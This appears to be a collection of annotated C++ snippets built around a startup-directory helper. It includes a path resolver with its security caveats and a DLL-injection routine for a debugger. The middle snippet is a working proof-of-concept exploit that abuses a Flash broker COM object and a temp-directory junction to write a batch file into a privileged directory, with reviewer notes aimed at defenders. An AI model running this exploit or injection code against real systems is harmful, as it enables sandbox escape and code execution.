Example #1
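	// Builds a full path for `path` by resolving it against the startup directory.
	//
	// Backslashes are converted to forward slashes first. A path that begins
	// with '/' is resolved against the root of the startup directory; a path
	// whose second character is ':' (drive-qualified) is returned as-is after
	// the slash conversion. Otherwise each '/'-terminated segment is applied
	// in turn: "." is skipped, ".." strips the last component unless the
	// root has been reached, anything else is appended.
	//
	// Security: the result is NOT confined to the startup directory. ".."
	// segments can walk up to the root and drive-qualified input bypasses
	// resolution entirely, so callers that pass untrusted input must validate
	// the returned path themselves before opening it.
	//
	// NOTE(review): the final segment (the text after the last '/') is
	// appended verbatim, so a trailing "." or ".." is not normalised.
	std::string FileSystem::GetFullPath(const std::string& path)
	{
		std::string startup = GetStartupDirectory();
		std::string p = StringHelper::Replace(path, '\\', '/');

		// Check the length before indexing: p[1] on an empty string is
		// undefined behaviour.
		if (!p.empty() && p[0] == '/') {
			startup = GetPathRoot(startup);
			p = StringHelper::TrimStart(p, '/');
		}
		else if (p.size() > 1 && p[1] == ':') {
			return p;
		}

		// size_type rather than int, so the comparison with npos does not
		// rely on a narrowing round-trip.
		std::string::size_type index;
		while ((index = p.find('/')) != std::string::npos) {
			const std::string d = p.substr(0, index);
			if (d == "..") {
				// Never climb above the root of the startup directory.
				if (GetPathRoot(startup) != startup) {
					// presumably startup uses '/' separators here; if it holds
					// no '/', find_last_of returns npos and startup is unchanged
					startup = startup.substr(0, startup.find_last_of('/'));
				}
			}
			else if (d != ".") {
				startup = StringHelper::TrimEnd(startup, '/') + "/" + d;
			}
			p = p.substr(index + 1);
		}

		return StringHelper::TrimEnd(startup, '/') + "/" + p;
	}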
// Proof-of-concept: asks an out-of-process broker COM object to write a file
// through a directory junction that the caller controls.
//
// Sequence visible in this function:
//   1. activate the broker class as a local (out-of-process) 32-bit server;
//   2. create "<temp>dummy_junction" and turn it into a junction that points
//      at the startup directory;
//   3. call BrokerWriteFile for "<junction>\exploit.bat" with the 6-byte
//      payload "calc\r\n";
//   4. remove the junction directory and release the broker.
//
// NOTE(review): what the broker checks before writing is not visible here.
// The function name suggests it validates the path it is given and not the
// location the path resolves to. For defenders, the control that matters is
// on the broker side: resolve the final path and refuse reparse points before
// writing on behalf of a less-privileged caller. A junction created in a temp
// directory followed by a broker-process write of a script file is a useful
// detection signal.
void DoFlashBrokerExploitJunction()
{
    CLSID clsid;
    HRESULT hr;

    // Return value is ignored; if parsing failed, clsid would be left unset.
    CLSIDFromString(L"{73c9dfa0-750d-11e1-b0c4-0800200c9a66}", &clsid);

    // Not initialised; only used when CoCreateInstance reports success.
    IFlashBroker5* pUnk;

    // CLSCTX_LOCAL_SERVER: the object runs in a separate server process.
    hr = CoCreateInstance(clsid, nullptr, CLSCTX_LOCAL_SERVER | CLSCTX_ACTIVATE_32_BIT_SERVER, IID_PPV_ARGS(&pUnk));
    if (SUCCEEDED(hr))
    {
        DebugPrintf("Created Broker: %p\n", pUnk);

        bstr_t tempDir = GetTempDir();

        // No separator is added, so GetTempDir() presumably returns a path
        // with a trailing backslash; confirm against its definition.
        tempDir = tempDir + L"dummy_junction";

        // Result ignored; the directory may already exist from an earlier run.
        CreateDirectoryW(tempDir, nullptr);

        // presumably clears a stale reparse point left by an earlier run
        FSLinks::DeleteJunctionPoint(tempDir);

        bstr_t baseDir = GetStartupDirectory();

        // assumes the argument order is (link, target); TODO confirm in FSLinks
        if (FSLinks::CreateJunctionPoint(tempDir, baseDir))
        {
            char data[] = "calc\r\n";
            std::vector<unsigned char> buf;

            // strlen excludes the terminator, so buf holds exactly the text.
            buf.resize(strlen(data));
            memcpy(&buf[0], data, buf.size());

            // The path names a file under the temp directory, but with the
            // junction in place it resolves to a file inside baseDir.
            BrokerWriteFile(pUnk, tempDir + L"\\exploit.bat", buf);
        }
        else
        {
            DebugPrintf("Failed to create junction\n");
        }

        // RemoveDirectoryW on a junction removes the link itself and leaves
        // the target directory and its contents in place.
        RemoveDirectoryW(tempDir);
        pUnk->Release();
    }
    else
    {
        DebugPrintf("Failed to create broker: %08X\n", hr);
    }
}
Example #3
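// Loads a DLL from the startup directory into another process by having that
// process call LoadLibraryA on the DLL's full path.
//
// processId   - id of the process that should load the DLL.
// dllFileName - file name appended to the startup directory. It is appended
//               verbatim, so callers should pass a bare, trusted file name;
//               separators or ".." in it would move the load outside the
//               startup directory.
//
// Returns true when the remote call ran and reported a non-null module
// handle; false on any failure, including a path that does not fit in
// _MAX_PATH.
bool DebugFrontend::InjectDll(DWORD processId, const char* dllFileName)
{

    if (dllFileName == NULL)
    {
        return false;
    }

    // Get the absolute path to the DLL.

    char fullFileName[_MAX_PATH];

    if (!GetStartupDirectory(fullFileName, _MAX_PATH))
    {
        return false;
    }

    // The original appended with an unchecked strcat, which overflows the
    // stack buffer when directory + file name exceed _MAX_PATH. Verify that
    // the result, including the terminator, fits before appending.
    const size_t capacity   = sizeof(fullFileName);
    const size_t dirLength  = strlen(fullFileName);
    const size_t nameLength = strlen(dllFileName);

    if (dirLength >= capacity || nameLength >= capacity - dirLength)
    {
        return false;
    }

    strcat(fullFileName, dllFileName);

    // NOTE(review): PROCESS_ALL_ACCESS is broader than remote allocation and
    // thread creation normally require. The rights that RemoteStrDup and
    // ExecuteRemoteKernelFuntion need are not visible here, so the mask is
    // left unchanged; narrow it once those helpers have been checked.
    HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, processId);

    if (process == NULL)
    {
        return false;
    }

    bool success = true;

    // Load the DLL.

    // Initialised so a failed remote call cannot leave an indeterminate value
    // that is then read as a module handle.
    DWORD exitCode = 0;
    char* remoteFileName = RemoteStrDup(process, fullFileName);

    if (remoteFileName == NULL)
    {
        // Copying the path into the target failed; do not start a remote call
        // with a null argument.
        success = false;
    }
    else if (!ExecuteRemoteKernelFuntion(process, "LoadLibraryA", remoteFileName, exitCode))
    {
        success = false;
    }

    // NOTE(review): exitCode is a DWORD, so only a zero / non-zero test on
    // the module handle is meaningful here.
    HMODULE dllHandle = reinterpret_cast<HMODULE>(exitCode);

    if (dllHandle == NULL)
    {
        success = false;
    }

    /*
    // Unload the DLL.
    // This is currently not needed since the process will automatically unload
    // the DLL when it exits, however at some point in the future we may need to
    // explicitly unload it so I'm leaving the code here.

    if (dllHandle != NULL)
    {

        if (!ExecuteRemoteKernelFuntion(process, "FreeLibrary", dllHandle, exitCode))
        {
            success = false;
        }
    
    }
    */

    if (remoteFileName != NULL)
    {
        VirtualFreeEx(process, remoteFileName, 0, MEM_RELEASE);
        remoteFileName = NULL;
    }

    CloseHandle(process);

    return success;

}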